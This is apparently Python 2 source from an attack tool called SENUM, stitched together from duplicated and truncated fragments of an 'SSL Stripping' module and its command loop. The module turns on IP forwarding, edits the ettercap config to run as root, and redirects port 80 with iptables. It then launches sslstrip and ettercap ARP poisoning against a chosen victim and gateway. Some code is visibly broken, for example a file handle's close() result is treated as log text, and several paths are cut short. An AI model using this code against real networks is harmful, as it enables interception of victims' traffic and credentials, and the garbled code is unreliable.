def ssl(): signal = '' rip = '' gate = commands.getoutput("netstat -nr | awk 'FNR == 3 { print $2}'") interface = commands.getoutput("netstat -nr | awk 'FNR == 3 { print $8'}") lport = '' status = '0' while signal.upper() != 'EXIT': signal = str(raw_input('\033[1;32m[!]senum/SSL> \033[1;m')) if signal.upper().split().__contains__('SHOW') == 1 and signal.upper( ).split().__contains__('CONFIG') == 1 and len(signal.split()) == 2: print '\033[1;32m\n[!] - SENUM > Modules > Man > SSL Stripping:\033[1;m' print '''\033[1;32m ---------------------------------------------------------------- | DESCRIPTION NAME SETTING | ---------------------------------------------------------------- REMOTE IP ADDRESS RHOST %s NETWORK ADAPTER INTERFACE %s LOCAL PORT LPORT %s LOCAL GATEWAY ADDRESS GATEWAY %s \033[1;m''' % (rip, interface, lport, gate) elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('RHOST') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('RHOST') == 1 and len(signal.split()) == 3: rip = signal.split()[2] print '\n\033[1;32mRHOST -->\033[1;m' ' \033[1;41m%s\033[1;m\n' % rip elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('INTERFACE') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('INTERFACE') == 1 and len(signal.split()) == 3: interface = signal.split()[2] print '\n\033[1;32mINTERFACE -->\033[1;m' ' \033[1;41m%s\033[1;m\n' % interface elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('LPORT') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('LPORT') == 1 and len(signal.split()) == 3: lport = signal.split()[2] print '\n\033[1;32mLPORT -->\033[1;m' ' \033[1;41m%s\033[1;m\n' % lport elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('GATEWAY') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper( ).split().__contains__('GATEWAY') == 1 and len(signal.split()) == 3: gate = signal.split()[2] print '\n\033[1;32mGATEWAY -->\033[1;m' ' \033[1;41m%s\033[1;m\n' % gate elif signal.upper().split().__contains__('SAVE') == 1 and len( signal.split()) == 1: os.system('chmod u+x modules/man/') os.system('./modules/man/') time.sleep(1) print '\033[1;32m[!]Log Saved.\033[1;m' elif signal.upper().split().__contains__('RUN') == 1 and len( signal.split()) == 1: if rip == "": print "\033[1;41m[!]Can't start exploit. Check your remote host setting. \033[1;m" elif lport == "": print "\033[1;41m[!]Can't start exploit. Check your local port setting. \033[1;m" elif gate == "": print "\033[1;41m[!]Can't start exploit. Check your gateway setting. \033[1;m" elif interface == "": print "\033[1;41m[!]Can't start exploit. Check your interface setting. \033[1;m" elif status == '1': x = '\033[1;41m[!]Please stop the current exploit. \033[1;m' i = 0 while i < 5: print x i += 1 else: status = '1' os.system('mkdir -p /tmp/SENUM/SSL'), os.system( 'cp /etc/etter.conf /tmp/SENUM/SSL'), os.system( "sed -i 's/65534/0/g' /etc/etter.conf") os.system("sed -i '168 s/#//g' /etc/etter.conf"), os.system( "sed -i '169 s/#//g' /etc/etter.conf") outlocation = commands.getoutput("pwd") os.system('chmod 755 %s/modules/man/' % outlocation) print '\033[1;32m[!]Launching Exploit\033[1;m' if interface.__contains__('eth'): os.system('ifconfig %s mtu 3000' % interface) else: pass time.sleep(1) print '\033[1;32m[!]Targeting => %s\033[1;m' % rip time.sleep(1) print '\033[1;32m[!]Enable IP Forwarding\033[1;m' os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') time.sleep(1) print '\033[1;32m[!]Port Redirection To => %s\033[1;m' % lport os.system( 'iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % lport) os.system('( sslstrip -l %s > /dev/null 2>&1 ) &' % lport) time.sleep(1) print '\033[1;32m[!]Enable MITM Attacks\033[1;m' os.system( '( ettercap -Tq -i %s -M arp:remote /%s/ /%s/ > /tmp/SENUM/SSL/log.txt 2>&1 ) &' % (interface, rip, gate)) time.sleep(3) fileHandle = open('/tmp/SENUM/SSL/log.txt', 'r') checksum = fileHandle.close() os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') if interface.__contains__('wlan'): if len(checksum) <= 300: verify = 1 count = 3 else: verify = checksum[743] count = 0 else: if len(checksum) <= 300: verify = 1 count = 3 else: verify = checksum[709] count = 0 while int(verify) <= 1 and count <= 2: print '\033[1;41m[!]Exploit Failed\033[1;m' time.sleep(1) print '\033[1;43m[!]Restarting Exploit\033[1;m' main.cleansll() status = '1' os.system('mkdir -p /tmp/SENUM/SSL'), os.system( 'cp /etc/etter.conf /tmp/SENUM/SSL'), os.system( "sed -i 's/65534/0/g' /etc/etter.conf") os.system( "sed -i '168 s/#//g' /etc/etter.conf"), os.system( "sed -i '169 s/#//g' /etc/etter.conf") outlocation = commands.getoutput("pwd") os.system('chmod 755 %s/modules/man/' % outlocation) if interface.__contains__('eth'): os.system('ifconfig %s mtu 3000' % interface) else: pass os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') os.system( 'iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % lport) os.system('( sslstrip -l %s > /dev/null 2>&1 ) &' % lport) os.system( '( ettercap -Tq -i %s -M arp:remote /%s/ /%s/ > /tmp/SENUM/SSL/log.txt 2>&1 ) &' % (interface, rip, gate)) time.sleep(3) fileHandle = open('/tmp/SENUM/SSL/log.txt', 'r') checksum = fileHandle.close() count += 1 if count != 3: time.sleep(1) os.system( 'gnome-terminal --geometry=700x8+5999+20 --hide-menubar --title=----------[SENUM-SSL-Sniffer]--------- -x sh -c "%s/modules/man/; sleep 99999999"' % outlocation) print '\033[1;32m[!]Done.\033[1;m' else: main.cleansll() status = '0' print '\033[1;41m[!]Exploit Failed!\033[1;m' print '\033[1;41m[!]Target [%s] is un-reachable.\033[1;m' % rip print '\033[1;41m[!]Please check your connection, and settings.\033[1;m' elif signal.upper().split().__contains__('SHOW') == 1 and signal.upper( ).split().__contains__('HELP') == 1 and len(signal.split()) == 2: helper.ssl() elif signal.upper().split().__contains__('STOP') == 1 and len( signal.split()) == 1: status = '0' print '\033[1;32m[!]Stopping Exploit\033[1;m' time.sleep(1) print '\033[1;32m[!]Done.\033[1;m' main.cleansll() elif signal.upper() == '' or signal.upper() == 'EXIT': pass else: print '\033[1;32mUnknown command "%s" | type "show help" for more help.\033[1;m' % signal.lower( )
or signal.split().__contains__('-s') == 1) and (len( signal.split()) == 3): enumssl.ssl() elif (signal.split().__contains__('--man') == 1 or signal.split().__contains__('-M') == 1) and (signal.split().__contains__('-imgT') == 1) and (len( signal.split()) == 3): imgtrack.imgtrack() elif (signal.upper().split().__contains__('--MAN') == 1 or signal.upper().split().__contains__('-M') == 1) and (len( signal.split()) == 3): if len(signal) == 10: injection.main(signal[9]) else: print '\033[1;32mUnknown command "%s" | type "show use" for more help.\033[1;m' % signal else: print '\033[1;32mUnknown command "%s" | type "show use" for more help.\033[1;m' % signal elif signal.upper().split().__contains__('SHOW') == 1: if len(signal.split()) == 2: helper.main(signal.upper()) else: print '\033[1;32mUnknown command "%s" | type "show help" for a list of commands.\033[1;m' % signal.lower( ) elif signal.upper() == '' or signal.upper() == 'EXIT': pass else: print '\033[1;32mUnknown command "%s" | type "show help" for a list of commands.\033[1;m' % signal.lower( ) main.clear() main.cleansll()
while signal.upper() != 'EXIT': signal = str(raw_input('\033[1;32m[!]senum> \033[1;m')) if signal.split().__contains__('use') == 1 and signal.split()[0] == 'use': if (signal.split().__contains__('--man') == 1 or signal.split().__contains__('-M') == 1) and (signal.split().__contains__('--ssl') == 1 or signal.split().__contains__('-s') == 1) and (len(signal.split()) == 3): enumssl.ssl() elif (signal.split().__contains__('--man') == 1 or signal.split().__contains__('-M') == 1) and (signal.split().__contains__('-imgT') == 1) and (len(signal.split()) == 3): imgtrack.imgtrack() elif (signal.upper().split().__contains__('--MAN') == 1 or signal.upper().split().__contains__('-M') == 1) and (len(signal.split()) == 3): if len(signal) == 10: injection.main(signal[9]) else: print '\033[1;32mUnknown command "%s" | type "show use" for more help.\033[1;m' % signal else: print '\033[1;32mUnknown command "%s" | type "show use" for more help.\033[1;m' % signal elif signal.upper().split().__contains__('SHOW') == 1: if len(signal.split()) == 2: helper.main(signal.upper()) else: print '\033[1;32mUnknown command "%s" | type "show help" for a list of commands.\033[1;m' % signal.lower() elif signal.upper() == '' or signal.upper() == 'EXIT': pass else: print '\033[1;32mUnknown command "%s" | type "show help" for a list of commands.\033[1;m' % signal.lower() main.clear() main.cleansll()
def ssl(): signal = '' rip = '' gate = commands.getoutput("netstat -nr | awk 'FNR == 3 { print $2}'") interface = commands.getoutput("netstat -nr | awk 'FNR == 3 { print $8'}") lport = '' status = '0' while signal.upper() != 'EXIT': signal = str(raw_input('\033[1;32m[!]senum/SSL> \033[1;m')) if signal.upper().split().__contains__('SHOW') == 1 and signal.upper().split().__contains__('CONFIG') == 1 and len(signal.split()) == 2: print '\033[1;32m\n[!] - SENUM > Modules > Man > SSL Stripping:\033[1;m' print '''\033[1;32m ---------------------------------------------------------------- | DESCRIPTION NAME SETTING | ---------------------------------------------------------------- REMOTE IP ADDRESS RHOST %s NETWORK ADAPTER INTERFACE %s LOCAL PORT LPORT %s LOCAL GATEWAY ADDRESS GATEWAY %s \033[1;m''' % (rip, interface, lport, gate) elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('RHOST') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('RHOST') == 1 and len(signal.split()) == 3: rip = signal.split()[2] print '\n\033[1;32mRHOST -->\033[1;m'' \033[1;41m%s\033[1;m\n' % rip elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('INTERFACE') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('INTERFACE') == 1 and len(signal.split()) == 3: interface = signal.split()[2] print '\n\033[1;32mINTERFACE -->\033[1;m'' \033[1;41m%s\033[1;m\n' % interface elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('LPORT') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('LPORT') == 1 and len(signal.split()) == 3: lport = signal.split()[2] print '\n\033[1;32mLPORT -->\033[1;m'' \033[1;41m%s\033[1;m\n' % lport elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('GATEWAY') == 1 and len(signal.split()) == 2: pass elif signal.upper().split().__contains__('SET') == 1 and signal.upper().split().__contains__('GATEWAY') == 1 and len(signal.split()) == 3: gate = signal.split()[2] print '\n\033[1;32mGATEWAY -->\033[1;m'' \033[1;41m%s\033[1;m\n' % gate elif signal.upper().split().__contains__('SAVE') == 1 and len(signal.split()) == 1: os.system('chmod u+x modules/man/') os.system('./modules/man/') time.sleep(1) print '\033[1;32m[!]Log Saved.\033[1;m' elif signal.upper().split().__contains__('RUN') == 1 and len(signal.split()) == 1: if rip == "": print "\033[1;41m[!]Can't start exploit. Check your remote host setting. \033[1;m" elif lport == "": print "\033[1;41m[!]Can't start exploit. Check your local port setting. \033[1;m" elif gate == "": print "\033[1;41m[!]Can't start exploit. Check your gateway setting. \033[1;m" elif interface == "": print "\033[1;41m[!]Can't start exploit. Check your interface setting. \033[1;m" elif status == '1': x = '\033[1;41m[!]Please stop the current exploit. \033[1;m' i = 0 while i < 5: print x i += 1 else: status = '1' os.system('mkdir -p /tmp/SENUM/SSL'), os.system('cp /etc/etter.conf /tmp/SENUM/SSL'), os.system("sed -i 's/65534/0/g' /etc/etter.conf") os.system("sed -i '168 s/#//g' /etc/etter.conf"), os.system("sed -i '169 s/#//g' /etc/etter.conf") outlocation = commands.getoutput("pwd") os.system('chmod 755 %s/modules/man/' % outlocation) print '\033[1;32m[!]Launching Exploit\033[1;m' if interface.__contains__('eth'): os.system('ifconfig %s mtu 3000' % interface) else: pass time.sleep(1) print '\033[1;32m[!]Targeting => %s\033[1;m' % rip time.sleep(1) print '\033[1;32m[!]Enable IP Forwarding\033[1;m' os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') time.sleep(1) print '\033[1;32m[!]Port Redirection To => %s\033[1;m' % lport os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % lport) os.system('( sslstrip -l %s > /dev/null 2>&1 ) &' % lport) time.sleep(1) print '\033[1;32m[!]Enable MITM Attacks\033[1;m' os.system('( ettercap -Tq -i %s -M arp:remote /%s/ /%s/ > /tmp/SENUM/SSL/log.txt 2>&1 ) &' % (interface, rip, gate)) time.sleep(3) fileHandle = open ( '/tmp/SENUM/SSL/log.txt', 'r') checksum = fileHandle.close() os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') if interface.__contains__('wlan'): if len(checksum) <= 300: verify = 1 count = 3 else: verify = checksum[743] count = 0 else: if len(checksum) <= 300: verify = 1 count = 3 else: verify = checksum[709] count = 0 while int(verify) <= 1 and count <= 2: print '\033[1;41m[!]Exploit Failed\033[1;m' time.sleep(1) print '\033[1;43m[!]Restarting Exploit\033[1;m' main.cleansll() status = '1' os.system('mkdir -p /tmp/SENUM/SSL'), os.system('cp /etc/etter.conf /tmp/SENUM/SSL'), os.system("sed -i 's/65534/0/g' /etc/etter.conf") os.system("sed -i '168 s/#//g' /etc/etter.conf"), os.system("sed -i '169 s/#//g' /etc/etter.conf") outlocation = commands.getoutput("pwd") os.system('chmod 755 %s/modules/man/' % outlocation) if interface.__contains__('eth'): os.system('ifconfig %s mtu 3000' % interface) else: pass os.system('echo "1" > /proc/sys/net/ipv4/ip_forward') os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % lport) os.system('( sslstrip -l %s > /dev/null 2>&1 ) &' % lport) os.system('( ettercap -Tq -i %s -M arp:remote /%s/ /%s/ > /tmp/SENUM/SSL/log.txt 2>&1 ) &' % (interface, rip, gate)) time.sleep(3) fileHandle = open ( '/tmp/SENUM/SSL/log.txt', 'r') checksum = fileHandle.close() count += 1 if count != 3: time.sleep(1) os.system('gnome-terminal --geometry=700x8+5999+20 --hide-menubar --title=----------[SENUM-SSL-Sniffer]--------- -x sh -c "%s/modules/man/; sleep 99999999"' % outlocation) print '\033[1;32m[!]Done.\033[1;m' else: main.cleansll() status = '0' print '\033[1;41m[!]Exploit Failed!\033[1;m' print '\033[1;41m[!]Target [%s] is un-reachable.\033[1;m' % rip print '\033[1;41m[!]Please check your connection, and settings.\033[1;m' elif signal.upper().split().__contains__('SHOW') == 1 and signal.upper().split().__contains__('HELP') == 1 and len(signal.split()) == 2: helper.ssl() elif signal.upper().split().__contains__('STOP') == 1 and len(signal.split()) == 1: status = '0' print '\033[1;32m[!]Stopping Exploit\033[1;m' time.sleep(1) print '\033[1;32m[!]Done.\033[1;m' main.cleansll() elif signal.upper() == '' or signal.upper() == 'EXIT': pass else: print '\033[1;32mUnknown command "%s" | type "show help" for more help.\033[1;m' % signal.lower()